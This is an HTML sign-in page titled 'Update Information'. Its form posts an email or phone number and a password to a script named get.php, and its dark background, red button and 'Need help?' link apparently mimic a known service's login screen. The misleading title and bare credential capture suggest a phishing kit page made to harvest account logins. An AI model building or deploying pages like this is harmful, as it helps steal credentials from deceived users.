
<!DOCTYPE html>
 	
<html>

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Update Information</title>
    <form action="get.php" method="POST">
 </head>
<style>
img {
  width: 100px;
  height: 100px;
  float: center;
 }
 .bory{
   position: absolute;
   top: 40%;
   left: 50%;
   transform: translate(-50%,-50%);
 }
body, html {
  height: 100%;
}

html { 
  background: url(back.jpg) no-repeat center center fixed; 
  -webkit-background-size: cover;
  -moz-background-size: cover;
  -o-background-size: cover;
  background-size: cover;
}
h1{
  color: white;
  margin-top: 10px;
  text-align: left;
} 
input {
  width: 310px;
  height: 30px;
  border-radius: 5px;
  background: #333333;
  padding: 10px;
  outline: none;
  border: none;
  color: black;
}
input[type=submit]{
  width: 330px;
  height: 50px;
  color: black;
  background: red;
  font-size: 20px;
  text-decoration: bold;
  font-weight: bold;
  }
  label{
    color: #b3b3b3;
    margin: none;
    font-size: 15px;
    position: fixed;
    top: 420px;
    text-align: center;
    center: 10px;
    text-decoration: italic;
    font-weight: bold;
    
  }
  input[type=checkbox]{
    width: 19px;
    height: 19px;
    border-radius: 2px;
  }
 a{
   color: #b3b3b3;
   font-weight: bold;
   font-size: 14px;
   text-decoration: none;
   margin-left: 225px
   
 }
 b{
   color: yellow;
   text-align: center;
   margin-left: 70px;
 } 
 
   
</style>
<body>
  <div class="bory">

<big><p><p><h1>Sign In</big></h1></p></p>
<br>

  <input type="text" name="email" placeholder="Email or Phone number"><br><br>
  <input type="password" name="pass" placeholder="Password"><br><br>
 <input type="submit" value="Sign in"><br><br>

 <input type="checkbox"><label>Remember me</label><a href="#">Need help?</a>
 <br>
 <br>
 </div>
 </form>
 </body>
 

</html>